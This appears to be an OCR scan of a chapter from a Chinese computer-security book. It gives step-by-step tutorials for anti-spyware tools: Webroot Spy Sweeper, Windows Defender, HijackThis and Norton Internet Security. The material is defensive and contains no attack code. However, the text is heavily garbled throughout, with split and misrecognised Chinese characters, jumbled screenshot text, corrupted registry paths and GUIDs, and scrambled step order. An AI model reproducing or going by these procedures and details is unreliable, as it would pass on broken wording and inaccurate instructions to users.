File Extensions to Ignore 
None Selected 





View Session Log Schedule This Sweep | | SwPep Now ] 








选择 “Custom Sweep ” 

( 自 定义 扫描 方式 ) 单 选 按 
钮 ， 在 下 方 列 表 中 选择 扫 
掏 对 象 。 


STEP05: 返回 主 界 面 


@ webroot Antivirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 


单 击 “Change 
Settings” 超 链接 。 


妙 Sweep Your Computer 
Sweeping Quarantine 








How a Sweep Works FF 


四 
Step 1: Search Your Com BB Virus Sweep: Off 


puter | 
The program searches for tems that could 人 











ee 
全- 攻防 从 入 门 到 精通 


STEP02: 切换 至 “Sweep” 标签 


Sweep | Shields | Update | Program | 


Sweep Type About Sweep Options ,| 

© Eull Sweep (Recommended) Quick Sweep is a light sweep 让 at maximizes Use of your computer's 
processing power to sweep faster. It will search only locations where 
security issues are commonly found. 


SwepPp Al Attached Drves f E 

vAlUser Accounts 

Vv Direct Disk Sweeping 

Vv Rootkits 

w Verfy Executable Programs 
Bol et 


Windows Registry 
Mentory Objects 
Coolies 
Combressed Files 





| Schedule This Sweep | | Sweep Now 





选中 “Quick Sweep”( 快 速 扫描 方式 ) 单 选 按 钮 。 
STEP04: 打开 “Where to sweep” 对 话 框 


Webroot AntiVirus with Spy Sweeper - Custom Sweep 


What to Sweep 








加 计算 机 

-加 部 本 地 磁盘 (C:) 
| [ea 本 地 磁盘 (D:) 
4 对 本 地 磁盘 (E:) 


Skip File Types a 本 地 磁盘 (F:) 





Advanced Options 











可 以 设置 扫描 或 跳 过 的 具体 对 象 ， 然 后 单 击 “OK” 
按钮 。 


STEP06: 开始 要 描 


@ webroot Antivirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 


ey 


a) Home 


成 Sweep Your Computer 

| Sweeping \ Quarantine 
Sweep Status: 0 Items Detected 
Elapsed Time: 7 minutes 


pp Sweep 





> Shields 


匡 Options 





compromise your computers security. 


Step 2: Quarantine Items Detected 
The program moves detected Kems to a holding area called a 
"Quarantine.” You decide what to do with items (keep, 
restore or delete). 
(Quarantine of threats requires an active subscription.) 


Step 3: Summarize Actions 
The program summarizes the action you designated for ea 中 
found item. 











Start Full Sweep 
Start Quick Sweep 


pdated wihin the last 


Start Custom Sweep 
a thorough System 





3 Drives 
本 地 菩 盘 (C:) 
本 地 赔 盘 (D:) 
本 地 磁盘 (E:) 
本 地 磁盘 (F:) 


山 Items 

Windows Registry 
Memory Objects 
Cookies 
Files 

图 Options 
All User Accounts 
Direct Disk Sweeping 
Compressed Files 


Verify Executable Programs 


Sweep Options 





单 击 “Sweep” 国 在 下 拉 列 表 中 选择 “Start 


按钮 。 
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Custom Sweep ”个 


DSR as 
和 


P Schedule E:\tempchace\kuping_s_24243.exe 





@ stop sweep| | | Ml Pause Sweep | 

















显示 扫描 进度 及 扫描 结果 。 


Total Definitions 376,992 


Items Inspected 

Memory 4,705 
Registry 349,290 
Cookies 246 


Files/Folders 108,273 


Detected 
Items 0 


Traces 0 


户 Quarantine Selected 





STEP07: 扫描 元 


©@ webroot AntiVirus with Spy Sweeper 
Free Threat Scan - Subscription Inactive r re: n - iption ctive 
re | 妙 Sweep Your Computer 
ee oa 
ovatere round oan 


Keeping your PC malware-free takes a lot of work, especially Description Next Event 


when crafty writers use new techniques to attack your PC. Virus Sweep: Off Full Sweep 2013/11/22 1:00 
Options Your PC could be targeted at any time. i 
er 


Search for 
Total Definitions ”376,992 



































Ek your PC with Webroot 4,752 
OY Antivirus with 
= the#lrated protection 349,290 


Full Sweep 





9 -Unrvaled detection and remova ookies 246 Last Event: N 
2 = 3 和 Fies/Folders 113,594 Next Event: 2013/11/22 1:00 
= ~ REE gtomer suppo EdtThisEvent | | DeleteThisEvent | | Run This Event Now | 
- FREE defense updates Detected 
= 





Items 0 
Traces 


Subscribe Now 








Add Events 


Add a scheduled sweep ”| Add... 


























国 显示 需要 清除 的 单 击 “Schedule” 可 创建 定时 扫描 任务 ， 其 中 包括 扫描 事件 、 开 始 扫 
对 象 。 按钮 。 描 时 间 等 。 


STEP09: 设置 各 种 对 得 的 防御 选项 等 


@ Webroot AntiVirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 


办 Options 


单 击 “Options” 按 钮 。 


ee tee pera rev bond on ogon tones ees or betoron 国 选择 择 “Shields” 选 项 卡 , 在 其 中 设置 各 种 对 象 


gas 的 防御 选项 ,使 其 在 用 户 上 网 过 程 中 及 时 保护 


图 Show notification above system tray 
© Open the program to show alert details 系 统 O 





19.2.3 ”微软 反 间 谍 专 家 Windows Defender 





Windows Defender 是 一 球 倪 旨 的 反 间 谍 软 件 。 它 可 以 帮 用 户 检 测 及 清除 一 些 潜 闫 在 操 
作 系 统 里 的 间谍 软件 及 广告 软件 ， 保 护 用 户 计算 机 使 其 不 受到 一 些 间谍 软件 的 安全 威胁 及 
控制 ， 也 保卫 了 使 用 者 的 安全 与 隐私 。 其 具体 的 操作 步骤 如 下 。 
STEP01: 打开 “控制 面板 ”窗口 STEP02: 打开 “Windows Defender” 窗 口 








Windows Defender 





”| 于 ， 拉 出面 、 所 有 控制 面板 项 ， Ey 帮 过 芝 测 夯 迷 
文件 (” 编 所 (E) 坦 看 工具 (D。 帮助 (H © 人 wy 主页 衣 3 并 :” 纺 git 录 粮 I (9) | 
调整 计算 机 的 设置 





快速 扫 撕 (Q) 


保护 计算 机 不 妥 间 并 软件 和 可 能 不 对 充 全 扫 撕 ( 


筷 Java Ey Program Updates a 自 定 又 扫描 ( 加 ]..， 
检查 有 证 或 可 能 不 过 要 的 


EN Realtek 高 清晰 音频 管理 器 Ee RemoteApp 和 桌面 连接 FE 
Se 检测 到 的 项 目 

| Windows CardSpace Windows Defender Ee 
间 严重 /高 警报 级 别 : 1 


gy 1 ] yj 
四 | Windows Update 哩 Windows 防火 墙 





选择 “开始 ”> “控制 面板 ”> “Windows 单 击 “ 扫 描 ” 右 侧 的 下 拉 按 钮 ， 可 选择 对 系统 进行 
Defender” 命 令 。 快速 扫描 、 完 全 扫描 和 自 定 义 扫 描 。 
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er 


售 人 人 他 


STEP03: 正在 扫描 


角 Windows Defender 


~ 


gx 主页 谍 扫描 |- 多 wit 录 称 IR 9)| 


保护 计算 机 不 受 间 谋 软 件 和 可 能 不 需要 的 软件 的 影响 


在 扫描 过 程 中 ， 如 果 系 统 中 存在 恶意 软件 ， 则 会 





完全 扫 往 

15:50 

00:04:22 
: 37670 








攻防 从 入 门 到 精通 


C:\ProgramData\Microsoft\Windows\Start Menu\Programs\real spy monitor\ 


现 提 示 信 息 A NO 


STEP05: ”警报 对 话 框 


Windows Defender 匡 报 


检测 | 至 让 和 页 目 
Trojan: Win32/Cinmeng 





显示 详细 信息 @)》> 清理 系统 外 ) | || 应 用 操作 上 


可 对 检测 到 的 项 目 进行 
删除 、 隔 高 或 允许 操作 。 
STEP07:” 返 回 主 界面 


Defender 


全 sa 主页 


| 日 
“| 


E33 


可 庶 软 件 和 可 能 不 需要 的 软件 的 影响 


单 击 “ 应 用 
操作 ”按钮 。 


让 3 莽 |-” 伟 Fi 和 I 阴 (9)|- 


工具 和 设置 
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单 击 页 面 顶部 的 “工具 ”链接 


连接 。 


STEPO4: 


返回 主 界面 


二 Windows Defender 


CS 命 主页 


保护 计算 机 不 受 间谍 软件 和 可 能 不 需要 的 软件 的 影响 


~ 
bh 


检测 到 的 项 目 
严重 /高 警报 级 别 ; 1 


)) 检查 有 害 或 可 能 不 雪 要 的 项 目 : 总 计 1 个 


和 岂 3 梢 |~ 候 Fi 契 I (9)1: 


_ RS 





检测 完成 后 
面 ， 可 以 看 到 检测 到 


的 有 害 项 目 。 
STEP06: ”删除 成 功 


Ve Defender 区 报 


已 应 用 选 定 的 操作 ， 


检测 肥 的 项 目 


应 用 请 求 的 操作 


结果 显示 在 状态 列 中 。 


咬 Trojan:Win327Cinmeng 


警报 级 别 


局 





返回 主 界 国 单 击 “ 复 查 检测 到 


的 项 目 ” 和 链接 。 


操作 


量 除 





显示 详细 信息 0) 


团 执行 


后 会 显示 


We o 
STEP08: 打开 “工具 和 设置 "页 面 


遍 | Windows Defender 


" Le 
主页 ed 
人 ， 


:| 


单 击 


i 选项 区 


| 清理 系统 中) | 


肛 成 


扫 并 | ~ 杂 万 i 


录 区 


吧 


链接 。 


| 应 用 操作 CD)_ | 





单 击 “ 关 闭 ” 
按钮 。 


I 具 (9)1|- 


Microsoft SpyNet 
加 入 在 线 社 区 ， 辜 助 识别 和 
阻止 间谍 软件 感染 。 


处 许 的 项 目 
章 看 您 选择 不 监视 的 软件 。 


Microsotft 亚 训 软件 防护 中 
尾 

获取 有 关 定 义 更 新 的 信息 以 
及 有 关 恶 章 软 件 的 最 新 信 
息 。 








间谍 软件 的 清除 和 系统 清理 


STEP09: 打开 “选项 ”页 面 


狂 Windows Defender 


CD ty an al- Fea D1 


— 


保护 计算 机 不 受 间 谋 软件 和 可 能 不 需要 的 软件 的 影响 


默认 可 作 加 自动 扫 欣 计算 机 (推荐 )(U) 
实时 保护 频谱 (Q): 


排除 的 文件 和 文件 夫 EE 和 
排除 的 文件 类 型 大 RT): 


a Ey 上 可 设置 自动 扫描 的 时 间 、 频 率 、 扫 描 类 型 、 默 认 操 
i 作 ， 以 及 是 否 使 用 实时 保护 。 








回 | 扫描 前 检查 更 新 的 定义 (向 
回 仅 当 系 统 空闲 时 运行 扫描 (R) 








网 络 这 个 先进 工具 给 和信 们 市 来 了 无 尽 便 捷 , 但 在 便捷 的 同时 也 存在 看 安全 隐患 。 因 此 ， 
为 了 将 安全 隐患 降 到 最 低 扣 ， 最 便捷 、 有 效 的 做 法 束 是 做 好 网 络 的 安全 防御 工作 。 


19.3.1 浏 宽 器 绑 染 元 星 囊 ackThis 


HijackThis 是 一 蒜 专 门 对 付 恶意 网 页 及 木马 的 程序 ， 可 将 绑架 于 浏览 器 的 恶意 程序 找 
出 来 并 将 其 删除 。 一 般 利 见 的 绑架 方式 无 非 是 强制 窜改 浏 Re 入 置 。 如 
果 用 户 使 用 了 HijackThis 软件 ， 束 可 以 将 所 有 可 疑 的 程序 全 抓 出 来 ， 再 让 用 户 判 断 是 耕 将 
其 清除。 基体 的 操作 步骤 如 下 。 

STEP01: 运行 HijackThis STEP02: 开始 扫描 系统 


电 Trend Micro HijackThis - v2.04 = Xx 









































Welcome to HijackThis, This program will scan your PC and generate a log fle of 
registry and file settings commonly manipulated by malware as well as good 
software， 





Main Menu ] : Rising Web Helper - {14A5ES6T-034B-471A-8908-598ABA93B24B} - IT 安装 \Ki singvRa 
02 - BHO: Lynec Click to Call BHO - {31D09BAD-12F5-4CCE-BESA-2923ETB60SDA} - C:\Program Fi 
02 - BHO: Ad-Aware Security Add-on - {6c97adle-4524-4019-86af-2aa2d56T7bf5c} - C:\Program 
02 - BHO: XunleiBHD - {889D2FEB-5411-4565-8998-1DD2C5261283} - D:\ 安 装 \BHD\XunleiBHDT. 2.1 三 
02 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008F02FF} - C: "PROGRA 1 \MICRO:E 
02 - BHO: Safellon Class - {B69F34DD-FOF9-42DC-9FTD-957187DA6886D]} - D:\Program Files\360%: 
02 - BH0: 中 国 工商 银行 BHD - {BB4491A2-D11A-4cBb-91C0-B53246A3122B} - C:\Program Files\ICI 
02 - BHO: QqMiniDLBHDHelper - {C9CT334B-5657-41el-8F7T9-FBAACECADSF4} - C:\Program Files\( 
02 - BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45BT-42AE-A9AA-ABA4BSDBDSBF} 
02 - BHO: hccountProtect - {TDD362CF-523B-4BC9-8FDC-58F93BBBC945} - C:\Users\Administrate 
03 - Toolbar: Ad-Aware Security Add-on -~ {6c97a91e-4524-4019-86Baf-2aa2d56Tbf5e} - C:\Prot 
04 - HEIM\.. \Run: [InterPass3000_ICBC] C:\Program Files\ICBCEbankTools\Feitian-InterPass: 
04 - HEIM.. \Run: [SDTray] “C:\Program Files\Spybot - Search & Destroy 2\SDTray. exe” 
04 - HETM'.. \Run: [360Safetray] “D:\Program Files\360\360safe\safemon\36B0tray. exe” /stari 
04 - HEIM'.. ‘Run: [SystemTray] SysTray. Exe 
04 - HEIM\.. \Run: [BaiduinTray] “C:\Program Files\Baidu\BaiduAn\l.1.0. 489\BaiduhnTray. ext 
04 - HKAN,,\Run，[ 木 马 清除 专家 ] 0D;\ 安 装 \ 水 马 清 除 专 家 2014\mmqczji. exe 
04 - HEUNN. .ARun， [Windows 木 马 防火 墙 ] C:\ftc2010\Trojanwall. exe 
]04 - HETNM\.. ‘Run: [Ad-Aware Browsing Protection] “C:\ProgramnData\hd-Aware Browsine Protet 
04 - HITM\.. \Run: [Search Protection] C:\ProgramData\Search Protection\SearchProtection. 
04 - HECU\. .ARun， [键盘 辅助 程序 《禁止 后 可 能 导致 无 法 输入 中 文 ) ] WW: MuserTemp\3BD0zip$Temp%3E 
04 - HECUN\.. ‘RunDnce: [adawarebp] reg. exe delete “HECU\Software\AppDataLow\Software\adaws 
04 - HKCU\. .ARun0nce: [adawarebp_XP] reg. exe delete “HKCU\Software\adawarebp” /f > 
Nd - HISAS-1-S-194 MRnn: [Sidoehar] YPraoromRiloc® Windnwe Si daharQSi dohar ove fantnRun 
-Scan & fix stuff Other stuff 


scan | 
和 





What would you like to do? 


Do a system scan only | 
View the list of backups | 
































JDDOUI 


Open the Misc Tools section | 
Open online HijackThis QuickStart | 


























None of the above, just start the program | 


fw Do not show this window when I start HijackThis 


ecked to ignorelist 























在 “HijackThis” 主 窗口 中 单 击 “Do a system 可 查看 扫描 信息 。 
scan and save a logfile ”按钮 。 
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FF 天 一 


全 人 人 他 
STEP03: 查看 扫描 结果 


| hijackthis,log - 记事 本 

文件 (F) 编辑 (E) ”格式 (DO) 童 看 (V) “帮助 (H) 

Logfile of Trend Micro Hi jackThis v2.0.4 
Scan saved at 16:00:04, on 2014/2/18 
Platform: Windows 7 SP1 (WinNT 6. 00. 3505) 


MSIE: Internet Explorer v11.0 (11. 00. 9600. 1 
Boot mode: Normal 


ll 





> 
攻防 从 入 门 到 精通 


STEP04: 修 





ot 
冯 
I 


Below are the results of the HijackThis scan, Be careful what you delete with the 'Fix 
checked' button. Scan results do not determine whether an item is bad me The 
best thing to do is to AnalyzeThis' and show the log file to knowledgeab| 


:Rising Web Helper 一 {14ASESBT- a = TD: “安装 \Risina\Ka 量 
BHU: Lyne 1C DLLas y= UJbAU-LZKS -LLE-b Ee LIbDUSURAS Lrogranm fF 
: hd-hware Security hdd-on 一 16c97a91e-4524-4019-86af-2aa2d56Tbf5c} - C:\Program 
: YunleiBHO - {889D2FEB-5411-4565-8998-1DD2C5261283} - D:\ 安 装 \BHDAXunLeiBHDOT.2. j| 三 
: URLRedirectionEBHD - {BA4F3M335-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA 1‘\MICRO: 
: Safellon Class - {B69F34DD-FOF9-42DC-9EDD-957187DAB88D} - D:\Program Files\380\: 
: 中 国 工商 银行 BHD - {BB4491A2-D11A-4c6b-91C0-B53246A3122B} - C:\Program Files\ICI 
: QAMiniDLBHOHelper - {C9C7334B-5657-41el-8F79-FBAANCECAODSF4} - C:\Program Files\( 


: Microsoft SkyDrive Pro Browser Helper - {L0498E0A-45BT-42AE-AQMA-ABAAGIDPDNSBF} 
口 : AccountProtect -~ {DID382CF-523B-4BC9-8FDC-S8F93BBBC945} -~ C:\Vsers\Administrate 
]03 - Toolbar: Ad-Aware Security Add-on - {Bc97a9le-4524-4019-86af-2aa2d56Tbf5c} - C:\Prot 
104 - HEOUA. . : [InterPass3000_ICEC] C:\Program Files\ICPCEbankTools\Feitian-InterPass: 
04 - HHIMN.. : [ShTray] “C:\Program Files\Spybot - Search & Destroy 2\SDTray. exe” 
04 - HIM.. : [360Safetray] “D:\Program Files\360\360safe\safemon\360tray. exe” /stari 
口 04 - HEIM'.. : [SystemTray] SysTray. Exe 
jes \Windows\Explorer. EXE 04 - HOM.. \Run: [BaiduAnTray] “C:\Program Files\Baidu\BaiduAn\1.1.0.489\BaiduAnTray. ext 
S i 了 ]04 - HEUA. .ARun: [木马 清除 专家 ] 了 :\ 安 装 \ 水 马 清除 专家 2014hmmqezj. exe 
C:\Program Files\ICBCEbankTools\Feitian— 了 04 - EUI\ .ARun。 [findows 木 马 防火 墙 ] C:Afte2010ATrojanwal1. exe 


lo04 - HU. . : [Ad-Aware Browsing Protection] “CAProgramDataAd-Aware Browsing Proter 
InterPass3000\certd nps3000 ICBC. exe i es ts 全 


: [Search Protection] C:\ProgramData\Search Protection\SearchProtection. ¢ 


C:\Program Files\Spybot — Search & Destroy ee ) ee ee 
2\SDTray. exe ne = wont en ed Ee enim 
D:\Program Files\360\360safe\safemon\360tra 

C:\Program Files\Baidu\BaiduAn 


Se & fix stuff Other stuff 
Config... | 
\1. 1.0.489\BaiduAnTray. exe 


aerhe | i 
2 | er a Add checked to ignorelis | 
C:\ftc2010\Trojanwall. exe | Se | | 





Running processes: 
C:\Windows\system32\taskhost. exe 
C:\Windows\system32\Dwm. exe 























扫描 结果 将 会 保存 到 记事 本 中 。 勾 选 需要 修复 的 单 击 “Info on selected 


项 目 。 item ”按钮 。 
STEP06: 返回 打 描 窗口 


[ 104 - HEIM'.. Run: [SDTray)] “C:\Froaram Files\Srp 
[ 04 - HETIM.. ‘Fun: [3B0Safetray] "DL:\Froeram 了 1 
02 - BHO: Rising Web Helper - [ 104 - HEIM'.. Run: [SystemTray] SysTray. Exe 
14A5E567-034B-471A-89D8-598A6A93B24B} - DA 安装 [ 04 - HETIM'.. ‘Run: [BaiduhnTraw] "C:“Proeram Fi 
\Rising\Rav\rsscrbho.dll 04 - HEIM'. . \Run: [森马 清除 专家 ] TD 安装 \ 本 己 清 
站 04 - HEI. .ARan: [Windows 木 马 防火 墙 ] C: “ftc201 
[104 - HETM. . ‘Run: [hd-hware Browsine Frotectin 
A BHO (Browser Helper Object) is a specially crafted program | |04 HETM'. .Ran [Search Protection] C: Nan 
that integrates into IE, and has virtually unlimited access rights 门 0d4 HERCUY . “Rn: [键盘 辅助 程序 {直上 | 后 可 能 可 能 导 3 
on your system, Though BHO's can be helpful (like the Google Do4 HEC: Cpanliees [Ladaribol] Tae ut dl 
Toolban, hijackers often use them for malicious purposes such me : 了 人 
as tracking your online behaviour displaying popup ads etc， [L104 - HECIN.. ‘RunDnce: [adawarebp_XP] reg. exe de 
[1nd HEI AAS-1-S 一 194 Ramr FSiAdohar] YPrno amFi 


Scan & fix stu 人 ff 


STEP05: 查看 说 明 信 息 


Detailed information on item O2: 


(Action taken: Registry key and CLSID key are deleted, BHO dll 


file is deleted.) Anal 
alyze 


Info on selected ite 


单 击 “ 确 定 ” 按 钮 。 单 击 
STEP07: 查看 提示 信息 





“ Fix checked ”按钮 。 
STEP08: 返回 打 描 窗口 


Run: [ 乎 专 家 ] 0 安生 过 己 肖 际 专 家 2014mmqezj. exe 
Run: [hindows 木 马 B 广 淡 墙 ] C:\ftc2010\Trojanwall. exe 

Fun: [hd-hware Browsine Frotection] "C:\Froeramlata\hd-hwar 
Fun: [Search Frotection] C:\FroeramData\Search Frotection's 
Run: [键盘 辅助 程序 “休止 后 可 能 导致 无 法 攻 六 中 文 ] 第: huserTe 
RurnDnee: [adawarebp] reg. exe delete "HECU\Software\ApplatalL 
RuanDnee， [adawarebp XP] reg. exe delete “HECU\Software\adawa 
—C—19%, VRun’: TSidohor] SPrnn-omFil ocd Windnwc Sidohoarh dideo 
Other stu 什 





W Fix 1 selected items? This will permanently delete and/or repair 


» what you selected. 


Info,,， 








单 击 “是 ”按钮 对 所 选项 目 进行 修复 。 单 击 “ 分 析 ” 按 钮 ， 可 将 扫描 到 的 可 疑 内 容 发 送 到 


网 站 ， 让 其 帮助 分 析 。 
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STEP09: 返回 扫描 窗口 


F-523B-4BC9-8FIC-S8F93BBBC945} -CC:AUsersAAadministrati 
H-on - {Bc9Tadle-4524-4019-BBaf-2aa2dBTbfiSc} - C:"Prot 
BC] C:\Program Files\ICECEbankTools\Feitian-InterFass: 
Er am Files\Spybot — Search & Testroy 2“SITray. exe” 
‘Froaram Files\3B0"\3B0safe\safemon\3B0tray. exe” /starl 
Tay. Exe 

‘Froaram Files\BaiduN\Baiduhn'l. 1.0.489"\BaiduhnTrary. exe 
安装 “水 马 清 除 专 家 2014h\mmgqezj. exe 

音 ] C:\£ftc2010\Trojanwall. exe 

E Frotection] “C:\FroeramData\hd-hware Browsine Proter 
pn] C:\Programlata\Search Protection\SearchProtection. ¢ 
止 后 可 能 导 豆 无 法 输入 中 充 》] 让: aserTempY360zip 和 TempA3E 
eg. exe delete "HECU\Software\hpplataLow Software\adaw: 


FP] ree. exe delete "HECI\Software\adawarebp” /Ef 


























Main Menu | Add checked to ignorelist 











单 击 “Configure ”按钮 。 团 单 击 “ Backups” 蝎 色 选 需要 恢复 的 项 目 并 单 
按钮 ， 可 以 看 到 修复 = ‘Restore” 按 钮 ， 即 可 
的 项 目 列表 。 恢复 到 原来 的 状态 。 


在 修复 之 后 暂时 不 要 清除 “备份 项 目 ” 列 表 中 的 内 容 ， 待 系统 重启 且 运 行 
常 后 再 清除 ， 以 免 造 成 不 必要 的 麻烦 


提示 





STEP11: 单 击 “Misc Tools” 按 钮 STEP12: ”进程 管理 


重 Trend Micro HijackThis - v2.0.4 [ 功 Trend Micro HijackThis - v2.0.4 





-Configuration 


| | re | 


Startuplist (integrated: v1.52) -Process Manager 


Generate StertupListlog | 厂 List also minor sections (full) Running processes: (29) 邹 贺 showpls 厂 
厂 Listempty sections (complete) C:\Windows\system32\taskhost,exe a 

C:\Windows\system32\Dwm.exe 
C:\Windows\Explorer.EXE 
C:\Program FilesVCBCEbankToolsWeitian-InterPass3000Wertd_nps3000_ICBC.exe 
C:\Program Files\spybot - Search & Destroy 2\WSDTray.eXe 
C:\Program Files\Baidu\BaiduAn\1. 1.0.489\BaiduAnTray.exe 
C:\ftc2010VTrojanwall.exe 
Open hosts fle manager “||opens an editor for the ‘hosts file. C:\Program Files\Rising\RSD\popwndexe.exe 

If a file cannot be removed from memory ECO AN 

， ’ C:\Program Files\Rising\RSAYVsleak.exe 
Delete a fie on reboot... | Windows can be setup to delete it when C:\Program Fies\Baidu\BaiduAn\1. 1.0.489\BaiduAn.exe 
the system is restarted， C:\program files\common files\baidu\bddownload\105\bddownloader,exe 


EEC | Delete a Windows NT Service (023), USE C:\Program Files\SogouInput\Components\sGImeGuard\1.0.0.20\sGImeGuard,exe 
二 WITH CAUTION! (WinNT4/2k/XP only) C:\Program Files\Micosoft Office\Office15\WINWORD.EXE 


Open ADS Spy... | Open the integrated ADS Spy utility to ee oe 
scan for hidden data streams, D:\Bin\WXPlatform.exe . 


Open a utility to the items in the 2 
Open Uninstall Manager... | Roa alors i ee | Re | | | Double-dick a file to view 


its properties 
































Scan & Fix stuff Other stuff 


5can | Fix checked | a Info, Back | 
[ 了 ,i 


checked to ignorelist 






































用 户 可 以 使 用 进程 管 单 击 “Open process ”在 “Process Manager” 选 项 组 中 可 对 当前 运行 的 
理 、 服 务 管理 、 程 序 管理 manager ”按钮 。 进程 进行 管理 。 
等 多 种 工具 。 
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EE 当 
#1 黑 
靳 


仿 人 人 
STEP13: 返回 “Misc Tools” 春 面 


蝇 Trend Micro HijackThis - v2.0.4 





Eee -到 
全- 攻防 从 入 门 到 精通 





-Configuration 





| | | 


Startuplist (integrated: v1.52) 


Generate StartuplListlog [List also minor sections (full) 
厂 List empty sections (complete) 





System tools 
or pee ror | Ooi pe pe ot 
Open hosts file manager | Opens an editor for the hosts file. 


“|If a file cannotbe removed from memory, 
.| Windows can be setup to delete it when 
the system is restarted. 
i Delete a Windows NT Service (O23), USE 
Delete sn NT service... WITH CAUTION! (WinNT4/2k/XP only) 
A Open the integrated ADS Spy utility to 
ES scan for hidden data streams. 


; Open a uitijity to manage the items in the 
Open Unins 计 | Manager,,， Add 有 ne 国 
ss 





TOther stuff 
| 














单 击 “Delete a file on reboot ... ”按钮 。 


STEP15: 返回 “Misc Tools” 春 面 
世 Trend Micro HijackThis - v2.04 
Configuration 


Main Ignorelist | Backups || iscToos 


StartupList (integrated: v1.52) 
Generate StartupList log | 厂 List also minor sections (full) 
厂 List empty sections (complete) 
System tools 
Opens a small process manager, working 
Open process manager | Oponia me pars mr 
Open hosts file manager | Opens an editor for the 'hosts' file. 
If a file cannot be removed from memory, 
Delete a file on reboot… | Windows can be setup to delete it when 
the System is restarted, 
Delete a Windows NT Service (O023), USE 
Delete an NT service,,. | WITH CAUTION! (WinNT3/ a 
Open the integrated ADS Spy utility to 
OpenADsspy. | scan for hidden data streams, 


“| |Open a utility to manage the items in the ] 











:| |AddjRemove Software ist， 同 














单 击 “Open Uninstall Manager... ”按钮 。 


10.3.2 诡 盾 网 络 安全 特警 








STEP14: 选择 需要 删除 的 文件 


Enter file to delete on reboot,.. 


CI 有 < 安装 ， Trend Micro ， HUackThis 》 











组 织 ”新 建文 件 夫 








^ “名称 
backups 
急 本 地 磁盘 (C:) 国 HiJackThis.exe 
ED 本 地 磁盘 (D:) EE hijackthis.log 


Gs tutuDisk (W:) _ 
员 MSN 上 的 “我 


全 网 络 
; 量 BODIETPOK 
闭 ZKG 





=| 奖 肌 








文件 名 (N): | 

















选 定 需要 删除 的 文件 ， 单 击 “ 打 开 ” 按 钮 ， 可 在 系 
统 重启 时 将 其 删除 。 
STEP16: 添加 / 移 除 程序 


熏 Trend Micro HijackThis - v2.0.4 


-Configuration- 


Main | Ignorelist | Backups | | Misc Tools 
-Add/jRemove Programs Manager — 


Here you can see the list of programs in the Add/Remove Software list in the Control Panel, You can edit the 
uninstall command or delete an item completely. Beware, restoring a deleted item is not possible! 


| -1 -一 system 兼容 问 a Name: [2007 office system 兼容 包 


360 字 | 

350 电 及 专家 8.6.6.0 etal command: [MsExec.exe /X{90120000-0020-0 
350 压 争 

3 | 
58 才 者 一 -一 

A Pro ea pen Add/Remove Software list 

Ad-Aware Security Add-on 

Adobe AIR 

Adobe AIR 

Adobe Communitly Help 

Adobe Community He 

Adobe Flash Player 12 ActiveX 

Adobe Media Player 

Adobe Media Player Refresh lis Save list... | Back 
Adobe Photoshop CS5 














FoOiher stuff 


JInrfo,,， | Back | 
上 dd checked to ignorelist 





Info on selecle 











选中 一 个 项 目 。 单 击 “ Delete this entry ” 
按钮 即 可 将 该 项 目 删 除 。 


“ 话 顿 网 络 安 全 特警 2013” 人 简体 中 文 版 是 文 持 Windows XP/2003/Vista/7/8 操作 系统 的 
安全 防护 软件 ， 它 提供 主动 式 行为 防护 ， 甚 至 可 以 在 传统 的 以 特征 为 基础 的 病毒 库 辨 认 出 

















前 ， 早 一 步 监 测 到 新 型 的 间谍 程序 及 病毒 。 每 隔 5 一 15 分 钟 提供 一 次 更 新 ， 以 检测 和 删除 


最 新 威胁 。 
1. 配置 网 络 安全 特警 


当 “ 诺 顿 网 络 安 全 特警 2013” 软 件 安装 
领略 其 新 颖 的 特性 。 有 具体 的 操作 步骤 如 下 。 
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完毕 之 后 ， 束 可 以 通过 配置 运行 此 软件 ， 从 中 


STEP01: 运行 


Norton Internet Security 


立即 扫 摘 LiveUpdate 


和 和 上 次 更 新 


在 主 窗口 查看 计算 单 击 “LiveUpdate” 
机 的 安全 状态 。 图 标 。 
STEP03: 对 系统 进行 扫描 


需要 的 操作 
兴 检测 到 的 威胁 


检测 到 的 威胁 


XScan 已 检测 到 ， 

讨 综 文件 "qqpcl1).exe’ 中 存在 风险 已 检测 到 。 将 狂 除 压 综 文 件 科 所 有 
内 容 ， 包括 未 受 感染 约 文 件 ， 

讨 在 风险 已 检测 到 。 符 痢 除 压缩 文件 和 所 有 内 
容 ， ee 

压 综 文件 "qq 简单 盗 2[1].0( 可 获取 gq 币 ).rar" 中 存在 风险 已 检测 到 。 将 蝇 
除 压 综 文 件 和 所 有 内 容 ， 包括 未 和 二 的 文件 

压 综 文件 kmspico( 最 简单 的 全 自动 win8-office2013 一 链 激 活 工具 ) v7.0 . 
已 检 光 车。 旅 诸 除 斥 缤 立 人 性 和 所 有 内 容 . 向 括 未 委 感 六 A 六 件 . 

已 阿 高 删除 的 文件 。 要 还 原 这 些 文件 ， 单 去 此 处 . 
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在 主 界面 单 击 “ 立 即 扫 描 ” 图 标 ， 对 系统 进行 扫 
描 ， 扫 描 完成 后 可 对 检测 到 的 威胁 进行 修复 、 忽 
略 或 排除 。 


STEP05: 打开 “设置 ”对 话 框 


防 病毒 和 SONAR 排除 
自 定义 排除 项 动 mm +]J 开 


EE 打开 
EE 于 ] 开 
而 打开 


电脑 扫描 
自 定义 扫 撕 病毒 、 间 谍 软 件 、 广 
告 软件 以 及 其 他 内 容 的 方式 SONAR 主动 防护 
SONAR 高 级 模式 ES 三 动 
实时 防护 
时 防护 设置 全 动 删 除 风险 0 公 在 高 度 确定 时 
在 我 高 开 时 删除 风险 ES 仅 在 高 度 矿 定 时 
[| 更 新 显示 SONAR 阻止 通知 [em 
启用 引导 时 间 保 护 ea 关闭 


~ 
在 主 界面 单 击 “ 高 级 ” 国 在 “实时 防护 


选项 卡 中 单 击 “ 配 
置 ” 链 接 。 


图 标 ， 然 后 依次 单 击 “ 计 
算 机 ”> “设置 "。 


“诺顿 网 络 安全 特警 2013” 
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STEP02: 软件 更 新 


Norton LiveUpdate 


正在 运行 LveUpdate,,， 








软件 正在 更 新 。 


STEP04: 打开 “安全 请 求 ” 对 话 框 


关闭 站 变 呈 能 会 前 弱 对 系统 的 防护 。 
- 知 训 防火 培 


选择 持续 时 间 


Norton 





在 主 界面 单 击 “ 高 级 ”图 标 ， 可 选择 开启 相应 防 
护 ， 例 如 开启 “智能 防火 墙 ”， 可 查看 其 功能 ， 单 
